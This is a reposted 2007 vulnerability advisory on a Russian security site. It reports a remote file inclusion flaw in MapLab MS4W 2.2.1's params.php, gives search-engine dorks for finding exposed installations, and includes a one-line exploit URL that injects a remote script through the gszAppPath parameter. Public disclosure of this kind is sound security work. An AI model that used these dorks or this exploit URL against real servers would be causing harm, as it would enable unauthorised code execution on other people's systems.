Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  [Full-disclosure] Wordpress 2.1.2 xmlrpc Vulnerabilities

  CWB PRO Version 1.
5(INCLUDE_PATH)
Remote File Include Vulnerabilites

  CWB PRO Version 1.
5(INCLUDE_PATH)
Remote File Include Vulnerabilites

  Flexphpnews 0.0.5 (news.php newsid) Remote SQL Injection Vulnerability

From:ka0x <ka0x01_(at)_gmail.com>
Date:5 апреля 2007 г.
Subject:MapLab MS4W 2.2.1 Remote File Inclusion Vulnerability

Bug Found By ka0x
D.O.M TEAM
we are: anonyph;arp;ka0x;xarnuz
Contact: [email protected]
FROM SPAIN
---

Script: MapLab
Version: 2.2.1
Official Site: http://www.maptools.org
Download: http://www.maptools.org/dl/ms4w/maplab_ms4w-2.2.1.zip

--

Bug File: params.php
Path: /htdocs/gmapfactory/params.php

Bug code in line 130:
include_once($gszAppPath."htdocs/gmapfactory/build_phtml.
php");

--
Dorks:

index.of /maplab-2.2
intitle:MapLab
index.of /maplab-2.2
index.of /maplab/

--

Exploit:
http://site.com/pathmaplab/htdocs/gmapfactory/params.php?gszAppPath=[EvilScript]

# milw0rm.com [2007-04-02]

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород